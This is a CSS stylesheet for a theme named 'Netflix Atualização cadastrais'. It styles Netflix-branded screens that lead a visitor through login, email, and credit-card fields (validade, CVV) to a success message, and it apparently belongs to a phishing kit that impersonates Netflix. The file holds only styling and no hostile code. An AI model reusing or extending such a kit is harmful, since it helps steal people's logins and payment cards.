/*
Theme Name: Netflix Atualização cadastrais
Author: MK(rj)
*/

.col-xs-6 {
    width: 50%;
}
.img-responsive{
  width: 100%;
}

/*input*/
h1, input::-webkit-input-placeholder, button {
  font-family: 'roboto', sans-serif;
  -webkit-transition: all 0.4s ease-in-out;
  transition: all 0.4s ease-in-out;
}
input {
    margin-top: 4%;
    width: 100%;
    border: solid 1px #8c8c8c;
    padding: 5px;
    background: #fff;
    color: #8c8c8c;
    transition: all 0.3s cubic-bezier(0.64, 0.09, 0.08, 1);
    -webkit-transition: all 0.3s cubic-bezier(0.64, 0.09, 0.08, 1);
    font-size: 16px;
    height: 50px;
    border-radius: 2px;
}
::-webkit-input-placeholder {
  color: #8c8c8c;
}
:-moz-placeholder { /* Firefox 18- */
  color: #8c8c8c;  
}
::-moz-placeholder {  /* Firefox 19+ */
  color: #8c8c8c;  
}
:-ms-input-placeholder {  
    color: #8c8c8c;  
}
input:focus, input:valid {
  box-shadow: none;
  outline: none;
  background-position: 0 0;
  border-bottom: solid 1px #8c8c8c;
}
input:focus::-webkit-input-placeholder, input:valid::-webkit-input-placeholder {
  color: #8c8c8c;
  font-size: 11px;
  -webkit-transform: translateY(-15px);
  transform: translateY(-15px);
  visibility: visible !important;
}

/*tela1*/
#tela1{
  background: url("../img/index.png");
  background-size: 100%;
}

/*FIm tela1*/

/*tela2*/
#tela2{
  background-color: #f3f3f3;
}
.logo img{
  width: 55%;
  margin-left: 5%;
}
.btn-entrar{
  float: right;
  color: #e50914;
  font-weight: bold;
  font-size: 20px;
  margin-right: 10%;
  margin-top: 7%;
}
section.img-dipositivo {
    margin-top: 16%;
}
.passos{
  margin: 10% auto 0;
}
.passos span{
  font-size: 12px;
}
.passos p{
  font-weight: bold;
  font-size: 21px;
}
p.texto-tela2 {
    text-align: center;
    width: 80%;
    margin: 0 auto;
}
/*Fim tela2*/

/*tela3*/
#tela3{
  background-color: #f3f3f3;
}
.email p{
  font-size: 13px;
}
.email span{
  color: #333;
  font-weight: bold;
  font-size: 17px;
}
button.btn-continuar {
    color: #8c8c8c;
    background-color: #e50914;
    font-size: 19px;
    padding: .75rem 25.33333333px;
    width: 80%;
    margin: 10% auto 0;
    border: none;
}
.btn-continuar a{
  color: #fff;
}
input[type="submit"]{
    color: #fff;
    background-color: #e50914;
    font-size: 19px;
    padding: .75rem 25.33333333px;
    width: 100%;
    margin: 10% auto 0;
    border: none;
}
/*Fim tela3*/

/*tela4*/
#tela4{
  background-color: #f3f3f3;
}
.passos-topocc{
  text-align: center;
}
.form-group {
    margin: 0;
}
#validade,#cvv{
  width: 48%;
  float: left;
  margin-right: 2%;
}
.bandeiras img{
  width: 30px;
  margin-top: 3%;
}
/*Fim tela4*/

/*tela6*/
#tela5{
  background: #f3f3f3;
    background-size: 100%;
    background-repeat: no-repeat;
    padding-top: 58%;
}
.logo-fim{
  text-align: center;
  margin-top: 15%;
}
.mensagem-sucesso{
  text-align: center;
}
.mensagem-sucesso h2{
  color: #000;
  font-size: 20px;
  font-weight: bold;
  margin-top: 5%;
}
.mensagem-sucesso p{
  color: #000;
}
/*Fim tela6*/



/*mobile*/
@media (max-width: 800px){

}

  @media (max-width: 280px){
    
}